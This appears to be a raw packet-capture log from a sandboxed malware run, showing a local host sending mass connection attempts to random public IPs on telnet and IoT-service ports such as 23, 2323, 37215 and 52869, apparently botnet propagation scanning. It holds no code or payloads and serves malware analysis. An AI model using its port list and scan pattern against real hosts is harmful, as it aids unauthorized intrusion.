                                                                  Nov 28, 2024 07:27:59.230869055 CET8049366177.120.79.8192.168.2.23
                                                                  Nov 28, 2024 07:27:59.230879068 CET37215596748.189.90.201192.168.2.23
                                                                  Nov 28, 2024 07:27:59.230911970 CET555544448203.238.209.21192.168.2.23
                                                                  Nov 28, 2024 07:27:59.231060982 CET4915252900143.207.148.54192.168.2.23
                                                                  Nov 28, 2024 07:27:59.231097937 CET803849631.195.52.61192.168.2.23
                                                                  Nov 28, 2024 07:27:59.231132984 CET80804156492.194.65.27192.168.2.23
                                                                  Nov 28, 2024 07:27:59.231151104 CET844343532153.64.107.165192.168.2.23
                                                                  Nov 28, 2024 07:27:59.231228113 CET8038606105.13.161.144192.168.2.23
                                                                  Nov 28, 2024 07:27:59.231338978 CET8044886177.77.86.253192.168.2.23
                                                                  Nov 28, 2024 07:27:59.231389046 CET8052188117.244.40.134192.168.2.23
                                                                  Nov 28, 2024 07:27:59.231399059 CET844360140210.126.43.16192.168.2.23
                                                                  Nov 28, 2024 07:27:59.231427908 CET757445422158.228.53.169192.168.2.23
                                                                  Nov 28, 2024 07:27:59.231616020 CET4915248626107.201.204.124192.168.2.23
                                                                  Nov 28, 2024 07:27:59.231663942 CET8040038201.195.59.217192.168.2.23
                                                                  Nov 28, 2024 07:27:59.231674910 CET808058462170.20.179.231192.168.2.23
                                                                  Nov 28, 2024 07:27:59.231709957 CET805573227.105.227.249192.168.2.23
                                                                  Nov 28, 2024 07:27:59.231719971 CET8145656109.55.98.37192.168.2.23
                                                                  Nov 28, 2024 07:27:59.231734991 CET80805474256.59.56.49192.168.2.23
                                                                  Nov 28, 2024 07:27:59.231873989 CET757445596158.60.86.218192.168.2.23
                                                                  Nov 28, 2024 07:27:59.231972933 CET757443880191.213.172.77192.168.2.23
                                                                  Nov 28, 2024 07:27:59.231983900 CET80803374833.12.176.23192.168.2.23
                                                                  Nov 28, 2024 07:27:59.232172012 CET3721543958128.118.97.120192.168.2.23
                                                                  Nov 28, 2024 07:27:59.232182980 CET803627679.128.124.157192.168.2.23
                                                                  Nov 28, 2024 07:27:59.232198954 CET808050332116.81.240.7192.168.2.23
                                                                  Nov 28, 2024 07:27:59.232247114 CET4915239428163.197.220.203192.168.2.23
                                                                  Nov 28, 2024 07:27:59.232337952 CET75744831238.198.165.69192.168.2.23
                                                                  Nov 28, 2024 07:27:59.232347012 CET806060828.115.34.207192.168.2.23
                                                                  Nov 28, 2024 07:27:59.232357025 CET8038366156.208.190.13192.168.2.23
                                                                  Nov 28, 2024 07:27:59.232515097 CET3721541518169.158.193.51192.168.2.23
                                                                  Nov 28, 2024 07:27:59.232523918 CET80804741228.196.179.23192.168.2.23
                                                                  Nov 28, 2024 07:27:59.232536077 CET808057454151.37.141.215192.168.2.23
                                                                  Nov 28, 2024 07:27:59.232559919 CET55554015499.216.95.166192.168.2.23
                                                                  Nov 28, 2024 07:27:59.232608080 CET814019622.57.27.162192.168.2.23
                                                                  Nov 28, 2024 07:27:59.232677937 CET804678497.137.41.211192.168.2.23
                                                                  Nov 28, 2024 07:27:59.232851982 CET4915245114171.119.20.118192.168.2.23
                                                                  Nov 28, 2024 07:27:59.232862949 CET491525942436.64.74.203192.168.2.23
                                                                  Nov 28, 2024 07:27:59.232877970 CET808046996136.27.141.23192.168.2.23
                                                                  Nov 28, 2024 07:27:59.232940912 CET808058364108.165.239.251192.168.2.23
                                                                  Nov 28, 2024 07:27:59.232952118 CET808057430109.90.191.175192.168.2.23
                                                                  Nov 28, 2024 07:27:59.232969046 CET80806075445.112.243.18192.168.2.23
                                                                  Nov 28, 2024 07:27:59.233020067 CET808056202217.163.66.130192.168.2.23
                                                                  Nov 28, 2024 07:27:59.320379972 CET8141272155.166.245.196192.168.2.23
                                                                  Nov 28, 2024 07:27:59.320396900 CET80805702424.158.93.235192.168.2.23
                                                                  Nov 28, 2024 07:27:59.320417881 CET80804501619.161.254.98192.168.2.23
                                                                  Nov 28, 2024 07:27:59.320429087 CET808046042193.206.30.210192.168.2.23
                                                                  Nov 28, 2024 07:27:59.320441961 CET8142548196.25.40.24192.168.2.23
                                                                  Nov 28, 2024 07:27:59.320466995 CET8059610103.210.62.103192.168.2.23
                                                                  Nov 28, 2024 07:27:59.320480108 CET80805976024.19.154.251192.168.2.23
                                                                  Nov 28, 2024 07:27:59.320749044 CET808045072209.161.87.32192.168.2.23
                                                                  Nov 28, 2024 07:27:59.320790052 CET8046998203.226.247.235192.168.2.23
                                                                  Nov 28, 2024 07:27:59.320816040 CET805021268.10.114.24192.168.2.23
                                                                  Nov 28, 2024 07:27:59.320847034 CET805171854.147.224.110192.168.2.23
                                                                  Nov 28, 2024 07:27:59.321094036 CET803741444.153.13.5192.168.2.23
                                                                  Nov 28, 2024 07:27:59.321104050 CET55556077615.182.172.18192.168.2.23
                                                                  Nov 28, 2024 07:27:59.321116924 CET804644455.164.19.178192.168.2.23
                                                                  Nov 28, 2024 07:27:59.321165085 CET808049042142.0.210.253192.168.2.23
                                                                  Nov 28, 2024 07:27:59.321332932 CET8055658135.72.135.237192.168.2.23
                                                                  Nov 28, 2024 07:27:59.321378946 CET805476876.160.156.242192.168.2.23
                                                                  Nov 28, 2024 07:27:59.321425915 CET808036838212.96.105.171192.168.2.23
                                                                  Nov 28, 2024 07:27:59.321436882 CET8046302187.46.100.111192.168.2.23
                                                                  Nov 28, 2024 07:27:59.321710110 CET3721537724220.235.116.138192.168.2.23
                                                                  Nov 28, 2024 07:27:59.321762085 CET808042786107.246.211.6192.168.2.23
                                                                  Nov 28, 2024 07:27:59.321789980 CET84433462864.202.42.164192.168.2.23
                                                                  Nov 28, 2024 07:27:59.321827888 CET8139656117.61.176.64192.168.2.23
                                                                  Nov 28, 2024 07:27:59.321839094 CET8040438196.196.81.227192.168.2.23
                                                                  Nov 28, 2024 07:27:59.322009087 CET4915238284203.108.157.203192.168.2.23
                                                                  Nov 28, 2024 07:27:59.322032928 CET75745428497.116.126.171192.168.2.23
                                                                  Nov 28, 2024 07:27:59.322092056 CET80450329.130.45.96192.168.2.23
                                                                  Nov 28, 2024 07:27:59.322279930 CET757444394152.145.133.63192.168.2.23
                                                                  Nov 28, 2024 07:27:59.322299957 CET8054816167.138.9.251192.168.2.23
                                                                  Nov 28, 2024 07:27:59.322309971 CET808044554215.109.47.160192.168.2.23
                                                                  Nov 28, 2024 07:27:59.322335958 CET3721544166198.219.16.2192.168.2.23
                                                                  Nov 28, 2024 07:27:59.322536945 CET805446440.134.41.147192.168.2.23
                                                                  Nov 28, 2024 07:27:59.322562933 CET805174840.57.210.168192.168.2.23
                                                                  Nov 28, 2024 07:27:59.322612047 CET80804620616.59.3.235192.168.2.23
                                                                  Nov 28, 2024 07:27:59.322623014 CET555550630205.138.223.89192.168.2.23
                                                                  Nov 28, 2024 07:27:59.322784901 CET3721542854158.70.45.62192.168.2.23
                                                                  Nov 28, 2024 07:27:59.322804928 CET555549770178.81.166.199192.168.2.23
                                                                  Nov 28, 2024 07:27:59.322841883 CET8080536189.27.194.149192.168.2.23
                                                                  Nov 28, 2024 07:27:59.322860956 CET844350148156.103.65.244192.168.2.23
                                                                  Nov 28, 2024 07:27:59.323242903 CET8037136197.96.116.135192.168.2.23
                                                                  Nov 28, 2024 07:27:59.323265076 CET80468987.22.161.37192.168.2.23
                                                                  Nov 28, 2024 07:27:59.323277950 CET80803739460.38.64.161192.168.2.23
                                                                  Nov 28, 2024 07:27:59.323292971 CET84435361256.49.113.237192.168.2.23
                                                                  Nov 28, 2024 07:27:59.323311090 CET808045848131.57.28.181192.168.2.23
                                                                  Nov 28, 2024 07:27:59.323359013 CET805886095.213.81.21192.168.2.23
                                                                  Nov 28, 2024 07:27:59.323369980 CET80805155257.213.32.146192.168.2.23
                                                                  Nov 28, 2024 07:27:59.323577881 CET84435745054.244.27.191192.168.2.23
                                                                  Nov 28, 2024 07:27:59.323615074 CET757444056221.66.59.135192.168.2.23
                                                                  Nov 28, 2024 07:27:59.323628902 CET844360002182.36.59.216192.168.2.23
                                                                  Nov 28, 2024 07:27:59.323683977 CET844353354189.249.191.153192.168.2.23
                                                                  Nov 28, 2024 07:27:59.323700905 CET80806023254.127.242.69192.168.2.23
                                                                  Nov 28, 2024 07:27:59.323712111 CET8148974170.18.225.85192.168.2.23
                                                                  Nov 28, 2024 07:27:59.323854923 CET808033612193.104.58.153192.168.2.23
                                                                  Nov 28, 2024 07:27:59.323867083 CET4915241324142.172.142.87192.168.2.23
                                                                  Nov 28, 2024 07:27:59.323899984 CET808054778171.79.99.1192.168.2.23
                                                                  Nov 28, 2024 07:28:00.349982977 CET4251680192.168.2.23109.202.202.202
                                                                  Nov 28, 2024 07:28:00.890006065 CET803660612.244.152.154192.168.2.23
                                                                  Nov 28, 2024 07:28:00.893882990 CET3660680192.168.2.2312.244.152.154
                                                                  Nov 28, 2024 07:28:00.976314068 CET757445422158.228.53.169192.168.2.23
                                                                  Nov 28, 2024 07:28:00.977945089 CET454227574192.168.2.23158.228.53.169
                                                                  Nov 28, 2024 07:28:01.054485083 CET808058364108.165.239.251192.168.2.23
                                                                  Nov 28, 2024 07:28:01.057862997 CET583648080192.168.2.23108.165.239.251
                                                                  Nov 28, 2024 07:28:01.306446075 CET8038690177.200.207.58192.168.2.23
                                                                  Nov 28, 2024 07:28:01.306550980 CET372153670282.114.241.74192.168.2.23
                                                                  Nov 28, 2024 07:28:01.309854031 CET3869080192.168.2.23177.200.207.58
                                                                  Nov 28, 2024 07:28:01.309890032 CET3670237215192.168.2.2382.114.241.74
                                                                  Nov 28, 2024 07:28:01.461150885 CET555557246119.215.99.156192.168.2.23
                                                                  Nov 28, 2024 07:28:01.461819887 CET572465555192.168.2.23119.215.99.156
                                                                  Nov 28, 2024 07:28:01.487454891 CET844334956111.78.196.116192.168.2.23
                                                                  Nov 28, 2024 07:28:01.489793062 CET349568443192.168.2.23111.78.196.116
                                                                  Nov 28, 2024 07:28:01.604001045 CET844360140210.126.43.16192.168.2.23
                                                                  Nov 28, 2024 07:28:01.605777979 CET601408443192.168.2.23210.126.43.16
                                                                  Nov 28, 2024 07:28:02.082159042 CET5268437215192.168.2.23144.141.113.17
                                                                  Nov 28, 2024 07:28:02.083354950 CET3941880192.168.2.23200.13.149.223
                                                                  Nov 28, 2024 07:28:02.096744061 CET424008080192.168.2.23102.193.207.146
                                                                  Nov 28, 2024 07:28:02.202208042 CET3721552684144.141.113.17192.168.2.23
                                                                  Nov 28, 2024 07:28:02.202334881 CET5268437215192.168.2.23144.141.113.17
                                                                  Nov 28, 2024 07:28:02.203258991 CET8039418200.13.149.223192.168.2.23
                                                                  Nov 28, 2024 07:28:02.203356028 CET3941880192.168.2.23200.13.149.223
                                                                  Nov 28, 2024 07:28:02.216687918 CET808042400102.193.207.146192.168.2.23
                                                                  Nov 28, 2024 07:28:02.216758966 CET424008080192.168.2.23102.193.207.146
                                                                  Nov 28, 2024 07:28:02.402044058 CET5268437215192.168.2.23144.141.113.17
                                                                  Nov 28, 2024 07:28:02.402420998 CET3941880192.168.2.23200.13.149.223
                                                                  Nov 28, 2024 07:28:02.414835930 CET424008080192.168.2.23102.193.207.146
                                                                  Nov 28, 2024 07:28:02.522027969 CET3721552684144.141.113.17192.168.2.23
                                                                  Nov 28, 2024 07:28:02.522300959 CET8039418200.13.149.223192.168.2.23
                                                                  Nov 28, 2024 07:28:02.534755945 CET808042400102.193.207.146192.168.2.23
                                                                  Nov 28, 2024 07:28:07.729834080 CET518341023192.168.2.2324.182.99.32
                                                                  Nov 28, 2024 07:28:07.729932070 CET5183423192.168.2.2399.74.108.169
                                                                  Nov 28, 2024 07:28:07.729970932 CET5183423192.168.2.2373.219.239.35
                                                                  Nov 28, 2024 07:28:07.730000973 CET5183423192.168.2.2392.186.90.104
                                                                  Nov 28, 2024 07:28:07.730004072 CET5183423192.168.2.23205.120.161.230
                                                                  Nov 28, 2024 07:28:07.730045080 CET5183423192.168.2.2312.45.201.69
                                                                  Nov 28, 2024 07:28:07.730045080 CET5183423192.168.2.2368.175.168.187
                                                                  Nov 28, 2024 07:28:07.730045080 CET5183423192.168.2.23218.71.66.230
                                                                  Nov 28, 2024 07:28:07.730084896 CET5183423192.168.2.2366.193.238.42
                                                                  Nov 28, 2024 07:28:07.730119944 CET5183423192.168.2.23177.153.224.108
                                                                  Nov 28, 2024 07:28:07.730129004 CET518342323192.168.2.23149.189.137.118
                                                                  Nov 28, 2024 07:28:07.730151892 CET5183423192.168.2.23180.141.156.108
                                                                  Nov 28, 2024 07:28:07.730154991 CET5183423192.168.2.2338.63.63.241
                                                                  Nov 28, 2024 07:28:07.730163097 CET5183423192.168.2.2390.234.228.45
                                                                  Nov 28, 2024 07:28:07.730182886 CET5183423192.168.2.23159.213.161.229
                                                                  Nov 28, 2024 07:28:07.730197906 CET5183423192.168.2.2312.214.45.54
                                                                  Nov 28, 2024 07:28:07.730221987 CET5183423192.168.2.23178.99.194.70
                                                                  Nov 28, 2024 07:28:07.730226994 CET5183423192.168.2.23203.222.174.107
                                                                  Nov 28, 2024 07:28:07.730246067 CET5183423192.168.2.2318.117.113.208
                                                                  Nov 28, 2024 07:28:07.730254889 CET5183423192.168.2.23193.136.3.1
                                                                  Nov 28, 2024 07:28:07.730283976 CET5183423192.168.2.23163.147.219.173
                                                                  Nov 28, 2024 07:28:07.730304956 CET5183423192.168.2.23135.221.122.200
                                                                  Nov 28, 2024 07:28:07.730317116 CET5183423192.168.2.2386.59.37.240
                                                                  Nov 28, 2024 07:28:07.730354071 CET5183423192.168.2.23210.2.49.78
                                                                  Nov 28, 2024 07:28:07.730364084 CET5183423192.168.2.2372.180.145.164
                                                                  Nov 28, 2024 07:28:07.730379105 CET5183423192.168.2.23202.105.120.10
                                                                  Nov 28, 2024 07:28:07.730391026 CET518342323192.168.2.2312.64.101.250
                                                                  Nov 28, 2024 07:28:07.730391026 CET5183423192.168.2.23177.20.13.63
                                                                  Nov 28, 2024 07:28:07.730391026 CET5183423192.168.2.2353.214.94.19
                                                                  Nov 28, 2024 07:28:07.730402946 CET5183423192.168.2.23147.73.187.185
                                                                  Nov 28, 2024 07:28:07.730407953 CET518342323192.168.2.23176.2.237.115
                                                                  Nov 28, 2024 07:28:07.730417967 CET5183423192.168.2.2390.246.154.236
                                                                  Nov 28, 2024 07:28:07.730431080 CET5183423192.168.2.23133.161.229.165
                                                                  Nov 28, 2024 07:28:07.730453968 CET5183423192.168.2.23212.165.227.239
                                                                  Nov 28, 2024 07:28:07.730468035 CET5183423192.168.2.2314.15.29.196
                                                                  Nov 28, 2024 07:28:07.730482101 CET5183423192.168.2.2368.98.16.71
                                                                  Nov 28, 2024 07:28:07.730494976 CET5183423192.168.2.2395.167.222.187
                                                                  Nov 28, 2024 07:28:07.730508089 CET5183423192.168.2.2337.4.224.95
                                                                  Nov 28, 2024 07:28:07.730523109 CET5183423192.168.2.23183.232.188.146
                                                                  Nov 28, 2024 07:28:07.730532885 CET5183423192.168.2.23216.136.62.214
                                                                  Nov 28, 2024 07:28:07.730561972 CET518342323192.168.2.23118.88.159.199
                                                                  Nov 28, 2024 07:28:07.730573893 CET5183423192.168.2.23174.250.154.215
                                                                  Nov 28, 2024 07:28:07.730586052 CET5183423192.168.2.23183.120.2.205
                                                                  Nov 28, 2024 07:28:07.730601072 CET5183423192.168.2.23196.241.107.177
                                                                  Nov 28, 2024 07:28:07.730619907 CET5183423192.168.2.23152.227.159.35
                                                                  Nov 28, 2024 07:28:07.730648994 CET5183423192.168.2.23155.147.88.109
                                                                  Nov 28, 2024 07:28:07.730663061 CET5183423192.168.2.2346.117.145.123
                                                                  Nov 28, 2024 07:28:07.730663061 CET5183423192.168.2.2383.130.14.204
                                                                  Nov 28, 2024 07:28:07.730674982 CET5183423192.168.2.23151.193.210.237
                                                                  Nov 28, 2024 07:28:07.730684996 CET5183423192.168.2.2342.219.97.40
                                                                  Nov 28, 2024 07:28:07.730714083 CET5183423192.168.2.23148.13.114.1
                                                                  Nov 28, 2024 07:28:07.730715990 CET518342323192.168.2.23153.128.236.153
                                                                  Nov 28, 2024 07:28:07.730726957 CET5183423192.168.2.23142.169.32.17
                                                                  Nov 28, 2024 07:28:07.730739117 CET5183423192.168.2.23125.200.70.208
                                                                  Nov 28, 2024 07:28:07.730755091 CET5183423192.168.2.2358.23.211.28
                                                                  Nov 28, 2024 07:28:07.730777979 CET5183423192.168.2.2347.219.241.21
                                                                  Nov 28, 2024 07:28:07.730793953 CET5183423192.168.2.2340.158.129.228
                                                                  Nov 28, 2024 07:28:07.730807066 CET5183423192.168.2.23152.217.64.215
                                                                  Nov 28, 2024 07:28:07.730814934 CET5183423192.168.2.23182.148.173.60
                                                                  Nov 28, 2024 07:28:07.730814934 CET5183423192.168.2.2327.77.187.123
                                                                  Nov 28, 2024 07:28:07.730822086 CET518342323192.168.2.2382.181.172.117
                                                                  Nov 28, 2024 07:28:07.730834007 CET5183423192.168.2.23141.30.8.114
                                                                  Nov 28, 2024 07:28:07.730843067 CET5183423192.168.2.2373.86.87.95
                                                                  Nov 28, 2024 07:28:07.730858088 CET5183423192.168.2.23210.187.219.38
                                                                  Nov 28, 2024 07:28:07.730878115 CET5183423192.168.2.2367.69.44.33
                                                                  Nov 28, 2024 07:28:07.730878115 CET5183423192.168.2.2375.217.181.0
                                                                  Nov 28, 2024 07:28:07.730890989 CET5183423192.168.2.23160.29.196.109
                                                                  Nov 28, 2024 07:28:07.730912924 CET5183423192.168.2.2363.89.75.233
                                                                  Nov 28, 2024 07:28:07.730912924 CET5183423192.168.2.2387.85.47.174
                                                                  Nov 28, 2024 07:28:07.730926037 CET5183423192.168.2.23211.240.199.148
                                                                  Nov 28, 2024 07:28:07.731559992 CET518342323192.168.2.23166.95.100.85
                                                                  Nov 28, 2024 07:28:07.731566906 CET5183423192.168.2.23133.246.190.19
                                                                  Nov 28, 2024 07:28:07.731576920 CET5183423192.168.2.23167.222.7.214
                                                                  Nov 28, 2024 07:28:07.731594086 CET5183423192.168.2.235.132.15.191
                                                                  Nov 28, 2024 07:28:07.731597900 CET5183423192.168.2.23175.34.246.191
                                                                  Nov 28, 2024 07:28:07.731606960 CET5183423192.168.2.2366.216.115.45
                                                                  Nov 28, 2024 07:28:07.731623888 CET5183423192.168.2.23205.229.30.1
                                                                  Nov 28, 2024 07:28:07.731640100 CET5183423192.168.2.23209.196.175.226
                                                                  Nov 28, 2024 07:28:07.731647968 CET5183423192.168.2.23220.82.128.39
                                                                  Nov 28, 2024 07:28:07.731662035 CET5183423192.168.2.2376.222.60.237
                                                                  Nov 28, 2024 07:28:07.731671095 CET518342323192.168.2.232.216.2.46
                                                                  Nov 28, 2024 07:28:07.731683969 CET5183423192.168.2.2346.107.33.156
                                                                  Nov 28, 2024 07:28:07.731694937 CET5183423192.168.2.23142.89.234.92
                                                                  Nov 28, 2024 07:28:07.731703997 CET5183423192.168.2.23153.17.65.19
                                                                  Nov 28, 2024 07:28:07.731739998 CET5183423192.168.2.2347.92.183.192
                                                                  Nov 28, 2024 07:28:07.731754065 CET5183423192.168.2.2379.175.253.107
                                                                  Nov 28, 2024 07:28:07.731765032 CET5183423192.168.2.234.101.232.99
                                                                  Nov 28, 2024 07:28:07.731775999 CET5183423192.168.2.23202.43.94.98
                                                                  Nov 28, 2024 07:28:07.731781960 CET5183423192.168.2.2327.217.235.147
                                                                  Nov 28, 2024 07:28:07.731789112 CET5183423192.168.2.2314.248.165.45
                                                                  Nov 28, 2024 07:28:07.731813908 CET5183423192.168.2.23195.8.52.25
                                                                  Nov 28, 2024 07:28:07.731823921 CET5183423192.168.2.23220.29.73.165
                                                                  Nov 28, 2024 07:28:07.731837034 CET5183423192.168.2.2334.147.100.152
                                                                  Nov 28, 2024 07:28:07.731848955 CET5183423192.168.2.232.8.223.200
                                                                  Nov 28, 2024 07:28:07.731858015 CET5183423192.168.2.23121.169.193.42
                                                                  Nov 28, 2024 07:28:07.731879950 CET5183423192.168.2.23217.192.192.149
                                                                  Nov 28, 2024 07:28:07.731882095 CET5183423192.168.2.2375.20.85.34
                                                                  Nov 28, 2024 07:28:07.731889963 CET518342323192.168.2.2338.244.192.242
                                                                  Nov 28, 2024 07:28:07.731899977 CET5183423192.168.2.2339.202.220.45
                                                                  Nov 28, 2024 07:28:07.731906891 CET5183423192.168.2.2397.129.90.195
                                                                  Nov 28, 2024 07:28:07.731919050 CET518342323192.168.2.23159.207.88.183
                                                                  Nov 28, 2024 07:28:07.731925011 CET5183423192.168.2.2398.126.106.61
                                                                  Nov 28, 2024 07:28:07.731942892 CET5183423192.168.2.2346.124.220.228
                                                                  Nov 28, 2024 07:28:07.731951952 CET5183423192.168.2.23184.80.121.61
                                                                  Nov 28, 2024 07:28:07.731966019 CET5183423192.168.2.23154.33.109.236
                                                                  Nov 28, 2024 07:28:07.731973886 CET5183423192.168.2.23217.107.86.197
                                                                  Nov 28, 2024 07:28:07.731975079 CET5183423192.168.2.23110.51.128.111
                                                                  Nov 28, 2024 07:28:07.731983900 CET5183423192.168.2.2339.13.14.185
                                                                  Nov 28, 2024 07:28:07.731998920 CET5183423192.168.2.23133.124.4.125
                                                                  Nov 28, 2024 07:28:07.732033968 CET518342323192.168.2.23160.126.89.203
                                                                  Nov 28, 2024 07:28:07.732033968 CET5183423192.168.2.23154.1.80.91
                                                                  Nov 28, 2024 07:28:07.732053995 CET5183423192.168.2.23163.84.192.29
                                                                  Nov 28, 2024 07:28:07.732059956 CET5183423192.168.2.2340.0.225.231
                                                                  Nov 28, 2024 07:28:07.732063055 CET5183423192.168.2.2327.200.148.160
                                                                  Nov 28, 2024 07:28:07.732074022 CET5183423192.168.2.2317.45.131.71
                                                                  Nov 28, 2024 07:28:07.732089996 CET5183423192.168.2.23168.12.214.75
                                                                  Nov 28, 2024 07:28:07.732131004 CET5183423192.168.2.23108.202.204.126
                                                                  Nov 28, 2024 07:28:07.732131958 CET5183423192.168.2.2312.58.99.250
                                                                  Nov 28, 2024 07:28:07.732146025 CET5183423192.168.2.23193.97.171.146
                                                                  Nov 28, 2024 07:28:07.732168913 CET518342323192.168.2.2378.219.117.109
                                                                  Nov 28, 2024 07:28:07.732182026 CET5183423192.168.2.23117.136.206.216
                                                                  Nov 28, 2024 07:28:07.732184887 CET5183423192.168.2.2391.8.37.46
                                                                  Nov 28, 2024 07:28:07.732189894 CET5183423192.168.2.23111.61.93.7
                                                                  Nov 28, 2024 07:28:07.732198000 CET518341023192.168.2.23114.175.171.99
                                                                  Nov 28, 2024 07:28:07.732218981 CET5183423192.168.2.23187.45.135.192
                                                                  Nov 28, 2024 07:28:07.732229948 CET5183423192.168.2.23114.46.162.97
                                                                  Nov 28, 2024 07:28:07.732248068 CET5183423192.168.2.2371.204.71.113
                                                                  Nov 28, 2024 07:28:07.732260942 CET5183423192.168.2.2373.253.223.96
                                                                  Nov 28, 2024 07:28:07.732273102 CET5183423192.168.2.231.27.10.27
                                                                  Nov 28, 2024 07:28:07.732291937 CET5183423192.168.2.23182.100.201.64
                                                                  Nov 28, 2024 07:28:07.732300043 CET518342323192.168.2.23171.47.100.141
                                                                  Nov 28, 2024 07:28:07.732311964 CET5183423192.168.2.23171.94.221.70
                                                                  Nov 28, 2024 07:28:07.732325077 CET5183423192.168.2.2388.210.161.72
                                                                  Nov 28, 2024 07:28:07.732335091 CET5183423192.168.2.2369.236.42.44
                                                                  Nov 28, 2024 07:28:07.732353926 CET5183423192.168.2.23154.154.174.49
                                                                  Nov 28, 2024 07:28:07.732362032 CET5183423192.168.2.2327.3.107.194
                                                                  Nov 28, 2024 07:28:07.732376099 CET5183423192.168.2.23217.135.73.224
                                                                  Nov 28, 2024 07:28:07.732388020 CET5183423192.168.2.2363.172.101.200
                                                                  Nov 28, 2024 07:28:07.732402086 CET5183423192.168.2.23187.93.136.153
                                                                  Nov 28, 2024 07:28:07.732417107 CET5183423192.168.2.23217.83.240.143
                                                                  Nov 28, 2024 07:28:07.732434988 CET518342323192.168.2.23163.229.222.4
                                                                  Nov 28, 2024 07:28:07.732445002 CET5183423192.168.2.23169.17.144.211
                                                                  Nov 28, 2024 07:28:07.732453108 CET5183423192.168.2.23211.208.112.231
                                                                  Nov 28, 2024 07:28:07.732472897 CET5183423192.168.2.23104.193.117.245
                                                                  Nov 28, 2024 07:28:07.732481003 CET5183423192.168.2.23116.57.224.6
                                                                  Nov 28, 2024 07:28:07.732495070 CET5183423192.168.2.23145.185.250.252
                                                                  Nov 28, 2024 07:28:07.732505083 CET5183423192.168.2.2363.48.27.166
                                                                  Nov 28, 2024 07:28:07.732515097 CET5183423192.168.2.2344.243.82.164
                                                                  Nov 28, 2024 07:28:07.732522964 CET5183423192.168.2.23169.93.46.117
                                                                  Nov 28, 2024 07:28:07.732543945 CET518342323192.168.2.2362.11.154.101
                                                                  Nov 28, 2024 07:28:07.732553959 CET5183423192.168.2.23178.218.8.36
                                                                  Nov 28, 2024 07:28:07.732567072 CET5183423192.168.2.23175.229.247.206
                                                                  Nov 28, 2024 07:28:07.732578993 CET5183423192.168.2.23178.149.233.158
                                                                  Nov 28, 2024 07:28:07.732603073 CET5183423192.168.2.2319.87.97.90
                                                                  Nov 28, 2024 07:28:07.732614994 CET5183423192.168.2.2358.33.249.131
                                                                  Nov 28, 2024 07:28:07.732624054 CET5183423192.168.2.23109.57.146.241
                                                                  Nov 28, 2024 07:28:07.732633114 CET5183423192.168.2.23210.1.132.241
                                                                  Nov 28, 2024 07:28:07.732639074 CET5183423192.168.2.2337.49.216.161
                                                                  Nov 28, 2024 07:28:07.732642889 CET5183423192.168.2.23192.106.2.233
                                                                  Nov 28, 2024 07:28:07.732655048 CET5183423192.168.2.2399.26.151.115
                                                                  Nov 28, 2024 07:28:07.849881887 CET10235183424.182.99.32192.168.2.23
                                                                  Nov 28, 2024 07:28:07.849915028 CET235183499.74.108.169192.168.2.23
                                                                  Nov 28, 2024 07:28:07.849955082 CET235183473.219.239.35192.168.2.23
                                                                  Nov 28, 2024 07:28:07.850025892 CET5183423192.168.2.2373.219.239.35
                                                                  Nov 28, 2024 07:28:07.850037098 CET518341023192.168.2.2324.182.99.32
                                                                  Nov 28, 2024 07:28:07.850594044 CET5183423192.168.2.2399.74.108.169
                                                                  Nov 28, 2024 07:28:07.850717068 CET411701023192.168.2.2324.182.99.32
                                                                  Nov 28, 2024 07:28:07.851130009 CET2351834205.120.161.230192.168.2.23
                                                                  Nov 28, 2024 07:28:07.851154089 CET235183492.186.90.104192.168.2.23
                                                                  Nov 28, 2024 07:28:07.851157904 CET5183423192.168.2.23205.120.161.230
                                                                  Nov 28, 2024 07:28:07.851192951 CET5183423192.168.2.2392.186.90.104
                                                                  Nov 28, 2024 07:28:07.851202965 CET235183412.45.201.69192.168.2.23
                                                                  Nov 28, 2024 07:28:07.851231098 CET5183423192.168.2.2312.45.201.69
                                                                  Nov 28, 2024 07:28:07.851237059 CET235183468.175.168.187192.168.2.23
                                                                  Nov 28, 2024 07:28:07.851250887 CET2351834218.71.66.230192.168.2.23
                                                                  Nov 28, 2024 07:28:07.851264954 CET5183423192.168.2.2368.175.168.187
                                                                  Nov 28, 2024 07:28:07.851274014 CET235183466.193.238.42192.168.2.23
                                                                  Nov 28, 2024 07:28:07.851279020 CET5183423192.168.2.23218.71.66.230
                                                                  Nov 28, 2024 07:28:07.851324081 CET2351834177.153.224.108192.168.2.23
                                                                  Nov 28, 2024 07:28:07.851332903 CET4957023192.168.2.2399.74.108.169
                                                                  Nov 28, 2024 07:28:07.851351023 CET5183423192.168.2.23177.153.224.108
                                                                  Nov 28, 2024 07:28:07.851371050 CET232351834149.189.137.118192.168.2.23
                                                                  Nov 28, 2024 07:28:07.851399899 CET518342323192.168.2.23149.189.137.118
                                                                  Nov 28, 2024 07:28:07.851452112 CET2351834180.141.156.108192.168.2.23
                                                                  Nov 28, 2024 07:28:07.851468086 CET235183438.63.63.241192.168.2.23
                                                                  Nov 28, 2024 07:28:07.851470947 CET5183423192.168.2.2366.193.238.42
                                                                  Nov 28, 2024 07:28:07.851485014 CET5183423192.168.2.23180.141.156.108
                                                                  Nov 28, 2024 07:28:07.851536036 CET235183490.234.228.45192.168.2.23
                                                                  Nov 28, 2024 07:28:07.851568937 CET5183423192.168.2.2390.234.228.45
                                                                  Nov 28, 2024 07:28:07.851571083 CET2351834159.213.161.229192.168.2.23
                                                                  Nov 28, 2024 07:28:07.851594925 CET235183412.214.45.54192.168.2.23
                                                                  Nov 28, 2024 07:28:07.851608992 CET2351834203.222.174.107192.168.2.23
                                                                  Nov 28, 2024 07:28:07.851613998 CET5183423192.168.2.23159.213.161.229
                                                                  Nov 28, 2024 07:28:07.851624966 CET5183423192.168.2.2338.63.63.241
                                                                  Nov 28, 2024 07:28:07.851629019 CET5183423192.168.2.2312.214.45.54
                                                                  Nov 28, 2024 07:28:07.851635933 CET5183423192.168.2.23203.222.174.107
                                                                  Nov 28, 2024 07:28:07.851636887 CET2351834178.99.194.70192.168.2.23
                                                                  Nov 28, 2024 07:28:07.851671934 CET5183423192.168.2.23178.99.194.70
                                                                  Nov 28, 2024 07:28:07.851721048 CET2351834193.136.3.1192.168.2.23
                                                                  Nov 28, 2024 07:28:07.851736069 CET235183418.117.113.208192.168.2.23
                                                                  Nov 28, 2024 07:28:07.851749897 CET2351834163.147.219.173192.168.2.23
                                                                  Nov 28, 2024 07:28:07.851751089 CET5183423192.168.2.23193.136.3.1
                                                                  Nov 28, 2024 07:28:07.851763964 CET5183423192.168.2.2318.117.113.208
                                                                  Nov 28, 2024 07:28:07.851780891 CET5183423192.168.2.23163.147.219.173
                                                                  Nov 28, 2024 07:28:07.851794958 CET2351834135.221.122.200192.168.2.23
